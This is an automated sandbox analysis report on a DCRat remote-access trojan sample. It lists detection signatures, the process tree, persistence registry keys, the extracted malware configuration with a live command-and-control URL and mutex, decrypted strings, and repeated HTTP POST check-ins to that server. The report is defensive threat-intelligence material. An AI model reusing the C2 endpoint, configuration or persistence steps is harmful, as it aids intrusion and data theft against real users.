Edit tour

Windows Analysis Report
QMT2731i8k.exe

Overview

General Information

Sample name:	QMT2731i8k.exe renamed because original name is a hash value
Original sample name:	2d94c0a9c700f4a1552a1e2fe2cd33e2.exe
Analysis ID:	1552622
MD5:	2d94c0a9c700f4a1552a1e2fe2cd33e2
SHA1:	7dfe6f390ea59bc8d53431cd3a4756c109e201ee
SHA256:	352bb05902750f30bd3bc84600d65cad64eeae01c8e794ddb45a0d8453f691e9
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops executables to the windows directory (C:\Windows) and starts them

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to harvest and steal browser information (history, passwords, etc)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

QMT2731i8k.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\QMT2731i8k.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

csc.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7640 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES88DB.tmp" "c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7776 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7792 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

qioiNOJzhriMVnsRuLz.exe (PID: 7852 cmdline: "C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 8144 cmdline: "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

QMT2731i8k.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\QMT2731i8k.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 7604 cmdline: "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

QMT2731i8k.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\QMT2731i8k.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 7808 cmdline: "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

QMT2731i8k.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\QMT2731i8k.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 404 cmdline: "C:\Recovery\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 180 cmdline: "C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

qioiNOJzhriMVnsRuLz.exe (PID: 5340 cmdline: "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

QMT2731i8k.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\QMT2731i8k.exe" MD5: 2D94C0A9C700F4A1552A1E2FE2CD33E2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-fzODLxzHyrEEVr6DlLbF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1680583848.000000001266D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1677712641.0000000002480000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QMT2731i8k.exe PID: 7504	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: qioiNOJzhriMVnsRuLz.exe PID: 7852	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QMT2731i8k.exe.2480000.5.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.2.QMT2731i8k.exe.2480000.5.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7556, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\qioiNOJzhriMVnsRuLz.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QMT2731i8k.exe, ProcessId: 7504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qioiNOJzhriMVnsRuLz

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\qioiNOJzhriMVnsRuLz.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QMT2731i8k.exe, ProcessId: 7504, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\QMT2731i8k.exe", ParentImage: C:\Users\user\Desktop\QMT2731i8k.exe, ParentProcessId: 7504, ParentProcessName: QMT2731i8k.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", ProcessId: 7556, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\QMT2731i8k.exe, ProcessId: 7504, TargetFilename: C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\QMT2731i8k.exe", ParentImage: C:\Users\user\Desktop\QMT2731i8k.exe, ParentProcessId: 7504, ParentProcessName: QMT2731i8k.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline", ProcessId: 7556, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T06:52:19.608658+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49745	TCP
2024-11-09T06:52:58.891111+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49815	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T06:52:03.452133+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49730	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: QMT2731i8k.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://117813cm.n9shteam.in/ExternalRequest.php	Avira URL Cloud: Label: malware
Source: http://117813cm.n9shteam.in/	Avira URL Cloud: Label: malware
Source: http://117813cm.n9shteam.in/ExternalRequest.phpn/Ex	Avira URL Cloud: Label: malware
Source: http://117813cm.n9shteam.in	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bsHDGyqA5r.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\ZmxZjBOz.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\zBjMJrtf.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\PDeJzYJR.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\hpHHpWYQ.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb

Found malware configuration

Source: 00000000.00000002.1680583848.000000001266D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-fzODLxzHyrEEVr6DlLbF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	ReversingLabs: Detection: 68%
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\GZVUPftk.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\PDeJzYJR.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TtUAGVJK.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\YLzRFcIi.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ZmxZjBOz.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\hpHHpWYQ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kfyxwSYJ.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\zBjMJrtf.log	ReversingLabs: Detection: 70%
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: QMT2731i8k.exe	ReversingLabs: Detection: 68%
Source: QMT2731i8k.exe	Virustotal: Detection: 59%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\ZmxZjBOz.log	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zBjMJrtf.log	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WBdQFKdi.log	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EPzTPNOj.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: QMT2731i8k.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-fzODLxzHyrEEVr6DlLbF","0","GameHack","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhV1JJU2pGYVUwbHpTV3BKYVU5cFNqQmpibFpzU1dsM2FVMTVTVFpKYmxKNVpGZFZhVXhEU1RCSmFtOXBaRWhLTVZwVFNYTkphbFZwVDJsS01HTnVWbXhKYVhkcFRtbEpOa2x1VW5sa1YxVnBURU5KTTBscWIybGtTRW94V2xOSmMwbHFaMmxQYVVvd1kyNVdiRWxwZDJsUFUwazJTVzVTZVdSWFZXbE1RMGw0VFVOSk5rbHVVbmxrVjFWcFRFTkplRTFUU1RaSmJsSjVaRmRWYVV4RFNYaE5hVWsyU1c1U2VXUlhWV2xNUTBsNFRYbEpOa2x1VW5sa1YxVnBURU5KZUU1RFNUWkpibEo1WkZkVmFXWlJQVDBpWFE9PSJd"]
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack	String decryptor: [["http://117813cm.n9shteam.in/","ExternalRequest"]]

Source: QMT2731i8k.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QMT2731i8k.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.pdb source: QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002E09000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49815
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49745

Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1836Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 231332Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
